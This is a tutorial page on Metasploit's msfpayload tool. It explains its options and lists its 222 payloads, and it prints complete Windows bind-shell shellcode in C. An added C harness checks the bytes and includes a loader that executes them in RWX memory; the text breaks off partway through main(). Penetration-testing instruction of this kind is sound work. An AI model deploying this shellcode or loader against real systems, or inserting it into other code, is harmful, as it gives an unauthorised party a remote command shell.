Msfpayload

From www.metasploit-es.com.ar


msfpayload is a command-line front end to Metasploit that generates and outputs the various types of shellcode available in the Framework. Its most common use is generating shellcode for an exploit that is not yet in the Metasploit Framework, or trying out different payloads and options before finalizing a module. (msfpayload and msfencode were retired from the Framework in 2015 and replaced by msfvenom, which keeps the same var=val option syntax shown below but selects the payload with -p and the output format with -f.)

The tool has many options and variables available, but not all of them are obvious, given how little the help banner shows:

  root@bt:~# msfpayload -h
   Usage: /pentest/exploits/framework3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
  OPTIONS:
   -h        Help banner
   -l        List available payloads


How powerful this tool is becomes clear from the sheer number of shellcode types available to be customized for your specific exploit:

  root@bt:~# msfpayload -l
  Framework Payloads (222 total)
  ==============================
   Name                                             Description
   ----                                             -----------
   aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
   aix/ppc/shell_find_port                          Spawn a shell on an established connection
   aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
   aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
   bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
   bsd/x86/exec                                     Execute an arbitrary command
   bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
   bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
   bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
   bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
   bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
   bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
   bsd/x86/shell_find_port                          Spawn a shell on an established connection
   bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
   bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
   bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
   bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
   bsdi/x86/shell_find_port                         Spawn a shell on an established connection
   bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
   cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
   cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
   cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
   cmd/unix/generic                                 Executes the supplied command
   cmd/unix/interact                                Interacts with a shell on an established socket connection
   cmd/unix/reverse                                 Creates an interactive shell through two inbound connections
   cmd/unix/reverse_bash                            
Creates an interactive shell via bash's builtin /dev/tcp.
This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
   cmd/unix/reverse_netcat                          Creates an interactive shell via netcat
   cmd/unix/reverse_perl                            Creates an interactive shell via perl
   cmd/unix/reverse_ruby                            Connect back and create a command shell via Ruby
   cmd/windows/adduser                              Create a new user and add them to local administration group
   cmd/windows/bind_perl                            Listen for a connection and spawn a command shell via perl (persistent)
   cmd/windows/bind_ruby                            Continually listen for a connection and spawn a command shell via Ruby
   cmd/windows/download_exec_vbs                    Download an EXE from an HTTP(S) URL and execute it
   cmd/windows/reverse_perl                         Creates an interactive shell via perl
   cmd/windows/reverse_ruby                         Connect back and create a command shell via Ruby
   generic/debug_trap                               Generate a debug trap in the target process
   generic/shell_bind_tcp                           Listen for a connection and spawn a command shell
   generic/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   generic/tight_loop                               Generate a tight loop in the target process
   java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
   java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
   java/meterpreter/bind_tcp                        Listen for a connection, Run a meterpreter server in Java
   java/meterpreter/reverse_tcp                     Connect back stager, Run a meterpreter server in Java
   java/shell/bind_tcp                              Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
   java/shell/reverse_tcp                           Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
   linux/armle/adduser                              Create a new user with UID 0
   linux/armle/exec                                 Execute an arbitrary command
   linux/armle/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
   linux/mipsbe/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
   linux/mipsle/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
   linux/ppc/shell_bind_tcp                         Listen for a connection and spawn a command shell
   linux/ppc/shell_find_port                        Spawn a shell on an established connection
   linux/ppc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
   linux/ppc64/shell_bind_tcp                       Listen for a connection and spawn a command shell
   linux/ppc64/shell_find_port                      Spawn a shell on an established connection
   linux/ppc64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
   linux/x64/exec                                   Execute an arbitrary command
   linux/x64/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
   linux/x64/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
   linux/x64/shell_bind_tcp                         Listen for a connection and spawn a command shell
   linux/x64/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
   linux/x86/adduser                                Create a new user with UID 0
   linux/x86/chmod                                  Runs chmod on specified file with specified mode
   linux/x86/exec                                   Execute an arbitrary command
   linux/x86/meterpreter/bind_ipv6_tcp              Listen for a connection over IPv6, Staged meterpreter server
   linux/x86/meterpreter/bind_tcp                   Listen for a connection, Staged meterpreter server
   linux/x86/meterpreter/find_tag                   Use an established connection, Staged meterpreter server
   linux/x86/meterpreter/reverse_ipv6_tcp           Connect back to attacker over IPv6, Staged meterpreter server
   linux/x86/meterpreter/reverse_tcp                Connect back to the attacker, Staged meterpreter server
   linux/x86/metsvc_bind_tcp                        Stub payload for interacting with a Meterpreter Service
   linux/x86/metsvc_reverse_tcp                     Stub payload for interacting with a Meterpreter Service
   linux/x86/shell/bind_ipv6_tcp                    Listen for a connection over IPv6, Spawn a command shell (staged)
   linux/x86/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
   linux/x86/shell/find_tag                         Use an established connection, Spawn a command shell (staged)
   linux/x86/shell/reverse_ipv6_tcp                 Connect back to attacker over IPv6, Spawn a command shell (staged)
   linux/x86/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
   linux/x86/shell_bind_ipv6_tcp                    Listen for a connection over IPv6 and spawn a command shell
   linux/x86/shell_bind_tcp                         Listen for a connection and spawn a command shell
   linux/x86/shell_find_port                        Spawn a shell on an established connection
   linux/x86/shell_find_tag                         Spawn a shell on an established connection (proxy/nat safe)
   linux/x86/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
   linux/x86/shell_reverse_tcp2                     Connect back to attacker and spawn a command shell
   netware/shell/reverse_tcp                        Connect back to the attacker, Connect to the NetWare console (staged)
   osx/armle/execute/bind_tcp                       Listen for a connection, Spawn a command shell (staged)
   osx/armle/execute/reverse_tcp                    Connect back to the attacker, Spawn a command shell (staged)
   osx/armle/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
   osx/armle/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
   osx/armle/shell_bind_tcp                         Listen for a connection and spawn a command shell
   osx/armle/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
   osx/armle/vibrate                                
Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller.
   osx/ppc/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
   osx/ppc/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
   osx/ppc/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
   osx/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
   osx/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   osx/x86/bundleinject/bind_tcp                    Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
   osx/x86/bundleinject/reverse_tcp                 Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
   osx/x86/exec                                     Execute an arbitrary command
   osx/x86/isight/bind_tcp                          Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
   osx/x86/isight/reverse_tcp                       Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
   osx/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
   osx/x86/shell_find_port                          Spawn a shell on an established connection
   osx/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   osx/x86/vforkshell/bind_tcp                      Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
   osx/x86/vforkshell/reverse_tcp                   Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
   osx/x86/vforkshell_bind_tcp                      Listen for a connection, vfork if necessary, and spawn a command shell
   osx/x86/vforkshell_reverse_tcp                   Connect back to attacker, vfork if necessary, and spawn a command shell
   php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
   php/bind_php                                     Listen for a connection and spawn a command shell via php
   php/download_exec                                Download an EXE from an HTTP URL and execute it
   php/exec                                         Execute a single system command
   php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
   php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
   php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
   php/reverse_perl                                 Creates an interactive shell via perl
   php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
   php/shell_findsock                               
Spawn a shell on the established connection to the webserver.  Unfortunately, this payload can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working.  The issue this
payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on
other Debian-based distributions.  Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.
   solaris/sparc/shell_bind_tcp                     Listen for a connection and spawn a command shell
   solaris/sparc/shell_find_port                    Spawn a shell on an established connection
   solaris/sparc/shell_reverse_tcp                  Connect back to attacker and spawn a command shell
   solaris/x86/shell_bind_tcp                       Listen for a connection and spawn a command shell
   solaris/x86/shell_find_port                      Spawn a shell on an established connection
   solaris/x86/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
   tty/unix/interact                                Interacts with a TTY on an established socket connection
   windows/adduser                                  Create a new user and add them to local administration group
   windows/dllinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a Dll via a reflective loader
   windows/dllinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a Dll via a reflective loader
   windows/dllinject/bind_tcp                       Listen for a connection, Inject a Dll via a reflective loader
   windows/dllinject/find_tag                       Use an established connection, Inject a Dll via a reflective loader
   windows/dllinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
   windows/dllinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
   windows/dllinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a Dll via a reflective loader
   windows/dllinject/reverse_ord_tcp                Connect back to the attacker, Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp                    Connect back to the attacker, Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
   windows/dllinject/reverse_tcp_dns                Connect back to the attacker, Inject a Dll via a reflective loader
   windows/download_exec                            Download an EXE from an HTTP URL and execute it
   windows/exec                                     Execute an arbitrary command
   windows/messagebox                               Spawns a dialog via MessageBox using a customizable title, text & icon
   windows/meterpreter/bind_ipv6_tcp                Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/bind_nonx_tcp                Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/bind_tcp                     Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/find_tag                     Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_http                 Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_https                Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ipv6_tcp             Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_nonx_tcp             Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_ord_tcp              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp                  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp_allports         Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/meterpreter/reverse_tcp_dns              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
   windows/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
   windows/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
   windows/patchupdllinject/bind_ipv6_tcp           Listen for a connection over IPv6, Inject a custom DLL into the exploited process
   windows/patchupdllinject/bind_nonx_tcp           Listen for a connection (No NX), Inject a custom DLL into the exploited process
   windows/patchupdllinject/bind_tcp                Listen for a connection, Inject a custom DLL into the exploited process
   windows/patchupdllinject/find_tag                Use an established connection, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_ipv6_tcp        Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_nonx_tcp        Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_ord_tcp         Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp             Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp_allports    Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
   windows/patchupdllinject/reverse_tcp_dns         Connect back to the attacker, Inject a custom DLL into the exploited process
   windows/patchupmeterpreter/bind_ipv6_tcp         Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/bind_nonx_tcp         Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/bind_tcp              Listen for a connection, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/find_tag              Use an established connection, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_ipv6_tcp      Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_nonx_tcp      Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_ord_tcp       Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp           Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
   windows/patchupmeterpreter/reverse_tcp_dns       Connect back to the attacker, Inject the meterpreter server DLL (staged)
   windows/shell/bind_ipv6_tcp                      Listen for a connection over IPv6, Spawn a piped command shell (staged)
   windows/shell/bind_nonx_tcp                      Listen for a connection (No NX), Spawn a piped command shell (staged)
   windows/shell/bind_tcp                           Listen for a connection, Spawn a piped command shell (staged)
   windows/shell/find_tag                           Use an established connection, Spawn a piped command shell (staged)
   windows/shell/reverse_http                       Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
   windows/shell/reverse_ipv6_tcp                   Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
   windows/shell/reverse_nonx_tcp                   Connect back to the attacker (No NX), Spawn a piped command shell (staged)
   windows/shell/reverse_ord_tcp                    Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell/reverse_tcp                        Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell/reverse_tcp_allports               Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
   windows/shell/reverse_tcp_dns                    Connect back to the attacker, Spawn a piped command shell (staged)
   windows/shell_bind_tcp                           Listen for a connection and spawn a command shell
   windows/shell_bind_tcp_xpfw                      Disable the Windows ICF, then listen for a connection and spawn a command shell
   windows/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
   windows/speak_pwned                              Causes the target to say "You Got Pwned" via the Windows Speech API
   windows/upexec/bind_ipv6_tcp                     Listen for a connection over IPv6, Uploads an executable and runs it (staged)
   windows/upexec/bind_nonx_tcp                     Listen for a connection (No NX), Uploads an executable and runs it (staged)
   windows/upexec/bind_tcp                          Listen for a connection, Uploads an executable and runs it (staged)
   windows/upexec/find_tag                          Use an established connection, Uploads an executable and runs it (staged)
   windows/upexec/reverse_http                      Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
   windows/upexec/reverse_ipv6_tcp                  Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
   windows/upexec/reverse_nonx_tcp                  Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
   windows/upexec/reverse_ord_tcp                   Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp                       Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp_allports              Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
   windows/upexec/reverse_tcp_dns                   Connect back to the attacker, Uploads an executable and runs it (staged)
   windows/vncinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/bind_tcp                       Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/find_tag                       Use an established connection, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_ord_tcp                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp                    Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
   windows/vncinject/reverse_tcp_dns                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
   windows/x64/exec                                 Execute an arbitrary command (Windows x64)
   windows/x64/meterpreter/bind_tcp                 Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
   windows/x64/meterpreter/reverse_tcp              Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
   windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
   windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
   windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
   windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
   windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
   windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)


Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating: O, which prints the module summary together with its options, and the output-format letter (C, P, R and so on). In the example below we have selected a simple Windows inline bind shell. When we append the command-line argument "O" to that payload, we get every configurable option available for it:

  root@bt:~# msfpayload windows/shell_bind_tcp O
      Name: Windows Command Shell, Bind TCP Inline
    Module: payload/windows/shell_bind_tcp
   Version: 8642
  Platform: Windows
      Arch: x86
Needs Admin: No
Total size: 341
      Rank: Normal
Provided by:
 vlad902 
 sf 
  Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  LPORT     4444             yes       The listen port
  RHOST                      no        The target address
  Description:
 Listen for a connection and spawn a command shell


As we can see from the output, this payload has three configurable options; for each one the listing tells us whether it is required, what its default value is if it has one, and gives a short description:

   EXITFUNC
       Required
       Default setting: process 
   LPORT
       Required
       Default setting: 4444 
   RHOST
       Not required
       No default setting 

Setting these options in msfpayload is very simple. Below is an example of changing the exit technique and the listening port of the shell; the options are passed on the command line as var=val pairs before the output switch:

  root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O
      Name: Windows Command Shell, Bind TCP Inline
    Module: payload/windows/shell_bind_tcp
   Version: 8642
  Platform: Windows
      Arch: x86
Needs Admin: No
Total size: 341
      Rank: Normal
Provided by:
 vlad902 
 sf 
  Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
  LPORT     1234             yes       The listen port
  RHOST                      no        The target address
  Description:
 Listen for a connection and spawn a command shell

Now that everything is configured, the only thing left to specify is the output type, such as C, Perl, Raw and so on (the letters in the help banner). For this example we will output our shellcode as C:

  root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
  /*
   * windows/shell_bind_tcp - 341 bytes
   * http://www.metasploit.com
   * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
   * AutoRunScript=
   */
  unsigned char buf[] =
  "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
  "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
  "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
  "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
  "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
  "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
  "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
  "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
  "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
  "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
  "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
  "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
  "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
  "\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
  "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
  "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
  "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
  "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
  "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
  "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
  "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
  "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
  "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
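The buffer above is only useful once it is dropped into an exploit, and three mechanical checks save time before that: that the byte count really matches the "341 bytes" header, which bad characters the unencoded buffer contains, and that the LPORT given on the command line actually ended up in the sockaddr_in the bind stager builds (it is pushed as a single immediate, 68 02 00 04 d2, meaning AF_INET followed by 1234 in network byte order). The following C harness is an added example, not code from the original page or from the Metasploit project: it runs those checks on the exact bytes printed above and includes the usual VirtualAlloc/memcpy/call test stub, compiled only on Windows where the payload can run. The NUL/LF/CR bad-character list is an assumption chosen for illustration; the real list depends on the target's input path.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* windows/shell_bind_tcp, EXITFUNC=seh LPORT=1234, copied verbatim from the
 * msfpayload C output above. It is an unencoded inline payload: note the NULs. */
static const unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

/* The string literal carries one extra terminating NUL, so the payload length
 * is sizeof(buf) - 1; it must match the "341 bytes" header msfpayload printed. */
size_t shellcode_len(void)
{
    return sizeof(buf) - 1;
}

/* Count bytes of sc that appear in the bad-character list `bad` and, if
 * `first` is non-NULL, report the offset of the first hit (len when none). */
size_t count_bad_chars(const unsigned char *sc, size_t len,
                       const unsigned char *bad, size_t nbad, size_t *first)
{
    size_t hits = 0;
    if (first) *first = len;
    for (size_t i = 0; i < len; i++) {
        if (memchr(bad, sc[i], nbad) == NULL)
            continue;
        if (hits == 0 && first) *first = i;
        hits++;
    }
    return hits;
}

/* The bind stager builds its sockaddr_in with one "push imm32"
 * (68 02 00 04 d2 for LPORT=1234): sin_family = AF_INET (2) followed by the
 * port in network byte order. Decode that port, or return -1 if not found. */
int embedded_bind_port(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i + 5 <= len; i++)
        if (sc[i] == 0x68 && sc[i + 1] == 0x02 && sc[i + 2] == 0x00)
            return (sc[i + 3] << 8) | sc[i + 4];
    return -1;
}

/* Classic test stub: copy the bytes into RWX memory and call them. Windows
 * only; this is Windows x86 code, so elsewhere the function just returns -1. */
int run_shellcode(const unsigned char *sc, size_t len)
{
#ifdef _WIN32
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL)
        return -1;
    memcpy(mem, sc, len);
    ((void (*)(void))mem)();  /* does not return while the shell is live */
    return 0;
#else
    (void)sc; (void)len;
    return -1;
#endif
}

int main(void)
{
    /* Bad-character list assumed for illustration: NUL, LF, CR. */
    static const unsigned char bad[] = { 0x00, 0x0a, 0x0d };
    size_t len = shellcode_len(), first;
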